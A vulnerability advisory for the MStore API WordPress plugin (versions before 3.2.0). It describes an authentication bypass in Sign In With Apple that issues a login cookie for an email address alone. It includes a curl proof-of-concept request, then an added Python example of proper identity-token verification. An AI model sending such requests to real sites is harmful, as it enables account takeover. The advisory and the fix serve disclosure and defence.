MStore API < 3.2.0 - Authentication Bypass With Sign In With Apple

ID WPEX-ID:BF5DDC43-974D-41FA-8276-C1A27D3CC882
Type wpexploit
Reporter Vincent Datrier
Modified 2021-02-18T06:00:55


The plugin had an authentication bypass in its Sign In With Apple login, allowing unauthenticated users to obtain an authentication cookie with only an email address.

The plugin must have a valid purchase code for the request to work.

curl -X GET --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "email": "" }'
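
The description above says a cookie was issued from an email address alone. The following added example (not the plugin's code or its patch) shows the server-side check a Sign in with Apple login needs: the email is taken only from an identity token whose RS256 signature, issuer, audience and expiry verify, and a bare `email` field in the request is ignored. The `login` handler, the `identity_token` field name, the client ID and the toy key are assumptions made for the demonstration; real deployments load Apple's published signing keys and would normally use a vetted JWT library.

```python
import base64, hashlib, json, time

APPLE_ISS = "https://appleid.apple.com"  # issuer of Sign in with Apple identity tokens
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")  # RFC 8017 DigestInfo

def b64d(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64e(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def emsa(msg, k):
    t = SHA256_PREFIX + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def verified_email(token, keys, client_id, now=None):
    """Return the token's email claim only if the RS256 signature and claims check out."""
    try:
        h, p, s = token.split(".")
        header, claims = json.loads(b64d(h)), json.loads(b64d(p))
        n, e = keys[header["kid"]]  # keys: kid -> (modulus, exponent) from Apple's JWKS
        k, sig = (n.bit_length() + 7) // 8, b64d(s)
        if header["alg"] != "RS256" or len(sig) != k:
            return None
        em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
        if em != emsa(f"{h}.{p}".encode(), k):
            return None  # signature does not cover this header and payload
        ok = claims["iss"] == APPLE_ISS and claims["aud"] == client_id
        if not ok or claims["exp"] <= (now or time.time()):
            return None
        return claims["email"]
    except (AttributeError, KeyError, TypeError, ValueError):
        return None  # malformed or incomplete token: fail closed

def login(body, keys, client_id):
    """Hypothetical handler: identity comes from the verified token, never body['email']."""
    email = verified_email(body.get("identity_token", ""), keys, client_id)
    return {"status": 200, "user": email} if email else {"status": 401}

def sign_demo_token(claims, kid, n, d):  # fixture signer; Apple signs real tokens
    h, p = (b64e(json.dumps(x).encode()) for x in ({"alg": "RS256", "kid": kid}, claims))
    k = (n.bit_length() + 7) // 8
    sig = pow(int.from_bytes(emsa(f"{h}.{p}".encode(), k), "big"), d, n)
    return f"{h}.{p}.{b64e(sig.to_bytes(k, 'big'))}"

# Constructed toy key (two Mersenne primes), standing in for Apple's JWKS; not secure.
P, Q, E = 2**521 - 1, 2**607 - 1, 65537
N, D = P * Q, pow(E, -1, (P - 1) * (Q - 1))
KEYS = {"demo-kid": (N, E)}
```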